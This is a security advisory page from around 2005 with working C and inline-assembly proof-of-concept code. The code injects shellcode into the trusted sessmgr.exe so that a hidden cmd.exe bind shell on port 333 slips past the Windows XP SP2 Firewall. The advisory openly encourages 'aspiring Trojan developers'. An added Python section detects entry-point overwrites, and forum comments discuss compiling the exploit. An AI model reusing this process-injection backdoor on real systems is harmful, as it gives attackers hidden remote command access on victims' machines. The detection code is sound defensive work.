Windows XP Service Pack 2 incorporates many enhancements to try to better protect systems from malware and other forms of attacks. One of those layers of protection is the Windows XP SP2 Firewall. One of the features of this Firewall is the ability to allow users to decide what applications can listen on the network. By allowing users to control what applications can communicate on the network, Microsoft believes that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate, and in fact it is very easy for locally executing code to bypass the Windows Firewall. So don't worry, you aspiring Trojan developers: you're still going to be able to Trojan consumer and corporate systems to your heart's content.

Attached to this advisory is proof of concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the inherent trust of sessmgr.exe. Simply compile this program and run it as any local user. To test whether the Firewall has been bypassed (it is!), telnet from another machine to the target machine on port 333; if you're connected, then you've successfully bypassed the Windows XP Service Pack 2 Firewall.
Credit:
The information has been provided by americanidiot.
Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>

/* Replace the placeholder immediate of a "mov eax, imm32" (opcode 0xB8)
   in the copied stub with the address resolved at run time. */
void setfp(char *buffer, int sz, DWORD from, DWORD fp)
{
    int i;
    for (i = 0; i < sz - 5; i++)
        if (buffer[i] == '\xb8' && *(DWORD *)(buffer + i + 1) == from) {
            *(DWORD *)(buffer + i + 1) = fp;
            break;
        }
}

/* Copy the inline-assembly stub into buffer and patch in the API addresses. */
int injcode(char *buffer)
{
    HMODULE ws2_32;
    DWORD _loadlibrarya, _createprocessa, _wsastartup, _wsasocketa, _bind, _listen, _accept, _sleep;
    char *code;
    int len;

    ws2_32 = LoadLibrary("ws2_32");
    _loadlibrarya = (DWORD)GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA");
    _createprocessa = (DWORD)GetProcAddress(GetModuleHandle("kernel32"), "CreateProcessA");
    _sleep = (DWORD)GetProcAddress(GetModuleHandle("kernel32"), "Sleep");
    _wsastartup = (DWORD)GetProcAddress(ws2_32, "WSAStartup");
    _wsasocketa = (DWORD)GetProcAddress(ws2_32, "WSASocketA");
    _bind = (DWORD)GetProcAddress(ws2_32, "bind");
    _listen = (DWORD)GetProcAddress(ws2_32, "listen");
    _accept = (DWORD)GetProcAddress(ws2_32, "accept");

    __asm
    {
        call over
        push '23'
        push '_2sw'
        push esp
        mov eax,0x11111111
        call eax
        xor ebx,ebx
        push 0x64
        pop ecx
    wsadata:
        push ebx
        loop wsadata
        push esp
        push 0x101
        mov eax,0x33333333
        call eax
        push ebx
        push ebx
        push ebx
        push ebx
        push SOCK_STREAM
        push AF_INET
        mov eax,0x44444444
        call eax
        mov esi,eax
        push ebx
        push ebx
        push ebx
        push 0x4D010002 /* port 333 */
        mov eax,esp
        push 0x10
        push eax
        push esi
        mov eax,0x55555555
        call eax
        push SOMAXCONN
        push esi
        mov eax,0x66666666
        call eax
        push ebx
        push ebx
        push esi
        mov eax,0x77777777
        call eax
        mov edi,eax
        push ebx
        push ebx
        push ebx
        push ebx
        mov eax,esp
        push edi
        push edi
        push edi
        push ebx
        push SW_HIDE
        push STARTF_USESTDHANDLES
        push 0xA
        pop ecx
    startupinfo:
        push ebx
        loop startupinfo
        push 0x44
        mov ecx,esp
        push 'dmc'
        mov edx, esp
        push eax
        push ecx
        push ebx
        push ebx
        push ebx
        push 1
        push ebx
        push ebx
        push edx
        push ebx
        mov eax,0x22222222
        call eax
        push INFINITE
        mov eax,0x88888888
        call eax
    over:
        pop eax
        mov code,eax
    }

    len = 0xA0;
    memcpy(buffer, code, len);
    setfp(buffer, len, 0x11111111, _loadlibrarya);
    setfp(buffer, len, 0x22222222, _createprocessa);
    setfp(buffer, len, 0x33333333, _wsastartup);
    setfp(buffer, len, 0x44444444, _wsasocketa);
    setfp(buffer, len, 0x55555555, _bind);
    setfp(buffer, len, 0x66666666, _listen);
    setfp(buffer, len, 0x77777777, _accept);
    setfp(buffer, len, 0x88888888, _sleep);
    return len;
}

int main(void)
{
    STARTUPINFO sinfo;
    PROCESS_INFORMATION pinfo;
    CONTEXT context;
    LDT_ENTRY sel;
    DWORD read, tib, peb, exebase, peoffs, ep;
    IMAGE_NT_HEADERS pehdr;
    int len;
    char sessmgr[MAX_PATH + 13];
    char buffer[2048];

    GetSystemDirectory(sessmgr, MAX_PATH);
    sessmgr[MAX_PATH] = 0;
    strcat(sessmgr, "\\sessmgr.exe");
    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    /* Start the trusted image suspended so its entry point can be overwritten before it runs. */
    if (!CreateProcess(sessmgr, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &sinfo, &pinfo)) {
        printf("createprocess failed");
        exit(1);
    }
    /* Walk TEB -> PEB -> ImageBase -> e_lfanew -> IMAGE_NT_HEADERS to find the entry point. */
    context.ContextFlags = CONTEXT_FULL;
    GetThreadContext(pinfo.hThread, &context);
    GetThreadSelectorEntry(pinfo.hThread, context.SegFs, &sel);
    tib = sel.BaseLow | (sel.HighWord.Bytes.BaseMid << 16) | (sel.HighWord.Bytes.BaseHi << 24);
    ReadProcessMemory(pinfo.hProcess, (LPCVOID)(tib + 0x30), &peb, 4, &read);
    ReadProcessMemory(pinfo.hProcess, (LPCVOID)(peb + 0x08), &exebase, 4, &read);
    ReadProcessMemory(pinfo.hProcess, (LPCVOID)(exebase + 0x3C), &peoffs, 4, &read);
    ReadProcessMemory(pinfo.hProcess, (LPCVOID)(exebase + peoffs), &pehdr, sizeof(pehdr), &read);
    ep = exebase + pehdr.OptionalHeader.AddressOfEntryPoint;
    len = injcode(buffer);
    VirtualProtect((LPVOID)ep, len, PAGE_EXECUTE_READWRITE, &read);
    WriteProcessMemory(pinfo.hProcess, (LPVOID)ep, buffer, len, &read);
    ResumeThread(pinfo.hThread);
    return 0;
}
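The proof of concept finds where to write by following the PEB to the image base, reading e_lfanew at offset 0x3C and taking AddressOfEntryPoint from the optional header. The same header walk, done from the defender's side, gives an integrity check: the bytes at the entry point of the on-disk image should match the bytes at the same RVA in a memory snapshot of the process, and an overwritten entry point shows up as a mismatch. The Python below is an added example written for this page, not code from the advisory or its author. It constructs a minimal PE32 file as a fixture (every header value, the single .text section and the int3 filler used to simulate the overwrite are assumptions of the example), parses the fields the exploit relies on, simulates the loader's section mapping, and flags the tampered copy.

```python
"""Detect an overwritten PE entry point by comparing disk and memory images.
Added example with a constructed PE32 fixture; not the advisory's code."""
import struct

SECTION_ALIGN = 0x1000
FILE_ALIGN = 0x200


def build_sample_pe(code: bytes, entry_offset_in_text: int = 0x10) -> bytes:
    """Construct a minimal PE32 with one .text section (test fixture, assumed layout)."""
    e_lfanew = 0x40
    opt = bytearray(224)                                   # IMAGE_OPTIONAL_HEADER32
    struct.pack_into("<H", opt, 0, 0x10B)                  # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x1000 + entry_offset_in_text)  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x00400000)            # ImageBase
    struct.pack_into("<I", opt, 32, SECTION_ALIGN)
    struct.pack_into("<I", opt, 36, FILE_ALIGN)
    struct.pack_into("<I", opt, 56, 2 * SECTION_ALIGN)     # SizeOfImage
    struct.pack_into("<I", opt, 60, FILE_ALIGN)            # SizeOfHeaders
    # IMAGE_FILE_HEADER: i386, 1 section, no symbols, optional header size, EXE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    text = bytearray(FILE_ALIGN)
    text[entry_offset_in_text:entry_offset_in_text + len(code)] = code
    # IMAGE_SECTION_HEADER: name, VirtualSize, VirtualAddress, SizeOfRawData,
    # PointerToRawData, relocs, linenumbers, counts, Characteristics (code|exec|read)
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000,
                          len(text), FILE_ALIGN, 0, 0, 0, 0, 0x60000020)
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)            # e_lfanew, as the exploit reads it
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section).ljust(FILE_ALIGN, b"\0")
    return headers + bytes(text)


def _nt_headers_offset(image: bytes) -> int:
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew


def entry_point_rva(image: bytes) -> int:
    """AddressOfEntryPoint: 4-byte signature + 20-byte file header + offset 16."""
    nt = _nt_headers_offset(image)
    return struct.unpack_from("<I", image, nt + 4 + 20 + 16)[0]


def sections(image: bytes):
    """Yield (name, VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData)."""
    nt = _nt_headers_offset(image)
    nsec = struct.unpack_from("<H", image, nt + 6)[0]
    opt_size = struct.unpack_from("<H", image, nt + 20)[0]
    base = nt + 24 + opt_size
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, base + 40 * i)
        yield name.rstrip(b"\0"), va, vsize, rawptr, rawsize


def rva_to_file_offset(image: bytes, rva: int) -> int:
    for _, va, vsize, rawptr, rawsize in sections(image):
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + rawptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def map_image(disk_image: bytes) -> bytes:
    """Simulate the loader: headers at RVA 0, each section copied to its VirtualAddress."""
    nt = _nt_headers_offset(disk_image)
    size_of_image = struct.unpack_from("<I", disk_image, nt + 24 + 56)[0]
    size_of_headers = struct.unpack_from("<I", disk_image, nt + 24 + 60)[0]
    mem = bytearray(size_of_image)
    mem[:size_of_headers] = disk_image[:size_of_headers]
    for _, va, vsize, rawptr, rawsize in sections(disk_image):
        mem[va:va + rawsize] = disk_image[rawptr:rawptr + rawsize]
    return bytes(mem)


def entry_point_patched(disk_image: bytes, memory_image: bytes, window: int = 32) -> bool:
    """True when the first `window` bytes at the entry point differ between disk and memory."""
    rva = entry_point_rva(disk_image)
    off = rva_to_file_offset(disk_image, rva)
    return disk_image[off:off + window] != memory_image[rva:rva + window]


def demo() -> dict:
    """Clean mapping passes; a copy whose entry point was overwritten is flagged."""
    original = bytes.fromhex("55 8b ec 33 c0 5d c3")   # constructed stand-in prologue
    disk = build_sample_pe(original)
    clean = map_image(disk)
    tampered = bytearray(clean)
    rva = entry_point_rva(disk)
    tampered[rva:rva + 16] = b"\xcc" * 16               # constructed overwrite (int3 filler)
    return {"clean": entry_point_patched(disk, clean),
            "tampered": entry_point_patched(disk, bytes(tampered))}


if __name__ == "__main__":
    print(demo())
```

On a real process the memory side comes from a snapshot or a debugger read, and a raw byte comparison needs allowance for base relocations and vendor hot-patch prologues before it is usable as an alert. The broader point the advisory makes still stands regardless of such a check: a firewall exception keyed to an image path trusts the image, and that trust transfers to any code running as the same user that can start the image suspended and write into it.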

Subject: Compilation of code
Date: 25 Jan. 2006
From: Ping

Is this in C++? Or what language is it?

Subject: Compilation of code
Date: 4 Feb. 2006
From: Dr460nfly

obviously... LMAO

Subject: Compilation of code
Date: 6 Feb. 2006
From: Thot

How do I compile this code??? I can't compile the asm source...

Subject: no..
Date: 7 Apr. 2006
From: M3ocs-D4rksun

It's only C..
It isn't C++ code..
[]'s darksun

Subject: both wrong
Date: 14 May 2006
From: al

It's actually a combination of C and IA-32 assembly code... you should be able to tweak some settings in Visual Studio and get this to compile... I'll try it and let you know.

Subject: al is correct
Date: 16 May 2006
From: me

al is correct; if you look closely you can see the assembly code, and the header files that are declared are *.h, typically meaning C.

Subject: How to study the code
Date: 11 Aug. 2006
From: wanderleyBR

Did you use a bug in the software? Or did you map the Windows XP firewall with programs and create a crack???
Excuse my ignorance and my poor English.

Subject: also known as inline assembly ;)
Date: 30 Sep. 2006
From: none

It's also known as inline assembly, another powerful feature of the C and C++ languages. An example of a function containing inline asm is below:

void dumbshit()
{
    __asm__("xor %eax, %eax");
}

int main(int argc, char **argv)
{
    dumbshit();
}

The above would simply zero out the accumulator register.
Also, the above should compile smoothly with gcc, as I'm not too familiar with Intel syntax, only AT&T. I think the only differences are the register symbols such as %, which are different on this compiler, and also, if you were using other register names, they're backwards (depending on how you view it hehehe :), such as __asm__("mov %eax, %esp"); would be __asm__("mov esp, eax");, although I could be wrong; I stick to gcc for inline ;)

Subject: this
Date: 13 Oct. 2006
From: adadad

I want to hack but I'm only 13!!!!

Subject: Looks Nice :)
Date: 18 Jan. 2007
From: Cr45h_0v3r1de

My assembly skills aren't so good, so half of the code is a bit foreign to me.
Would I be right in saying most efficient trojans require asm? Or is that not necessarily true?
And "adadad", learn how to code (C is a nice place to start), get to grips with some networking concepts and topologies, then learn some exploitation techniques (web included!)... young is the best place to start. (And remember, friends come before computers).. Good luck.. if you're reading this :/

Subject: interesting
Date: 9 Feb. 2007
From: Nanolith_PL

Any documentation? Or is this pure hacking code? ;] (short and effective)

Subject: How it Works, Noobs...
Date: 18 Jul. 2007
From: Fishbones

Guys, it looks like none of you know what this does.
The program above allows you to exploit the trust of "sessmgr.exe" and bind the trojan to the port that it uses (or bind it to sessmgr.exe) to execute the trojan when sessmgr.exe is run (which is usually all of the time). It allows you to piggyback, as the author has said. And to all you kids who say "I want to hack", don't waste your time. You will probably end up a skiddie like most of them... A hacker is not a career, it is a lame ass label.

Subject: Is this code can be converted into .NET
Date: 10 Oct. 2007
From: Shees

I am a C# .NET programmer; asm is somehow not fully understandable for me. Can anyone guide me on how to convert this code to C#?

Subject: LOL
Date: 26 Oct. 2007
From: COOLDUDE

@Shees
Dude, I have one piece of advice for you. If you are a C# developer you should be able to learn C in a couple of days. There is a great book about C, "C Primer Plus", written by Stephen Prata. Remember, you are a guru if you know C :).

Subject: lol
Date: 18 Dec. 2007
From: H3x Cster

omg, omfg! lol, I have to agree with fishbones.
I have written a few apps and scripts myself in C and asm, and if you guys can't understand a few lines of code then what's the point in asking unrelated questions, or questions out of context?
I learnt to write some cool apps in VB6 initially and then moved on from there, and then I landed myself a copy of Metasploit.... which is a lazy way to hack really... but you still need to know how to write code if you want to publish your own or update existing exploits in/for the framework (I prefer v2.7 or a command-line version of 3.0-3.1).
It upsets me to see people who can't be bothered to do some research for themselves, by themselves! I also agree with what cooldude has said... give yourselves a couple of days with the right info and learn it.
Anyways I'm done, catch you never!

Subject: foo
Date: 8 Jul. 2008
From: some guy

Inline asm is NOT a feature of C++, and this is not C, as you can see from the parameter lists.
Also, converting this to C# is basically not possible without some real chores. It's not a low-level ("true") programming language. The just-in-time compiler turns the MSIL into asm... (bytecode for the CPU, but it's basically the same).

Subject: Inline assembly with C and calls to win32 API
Date: 4 Sep. 2008
From: Kevins

Really good!! .code.. ;).. It is all in assembly (inline) with C, with calls to the win32 API. Or basically a program written in C with a lot of asm code and calls to the win32 API.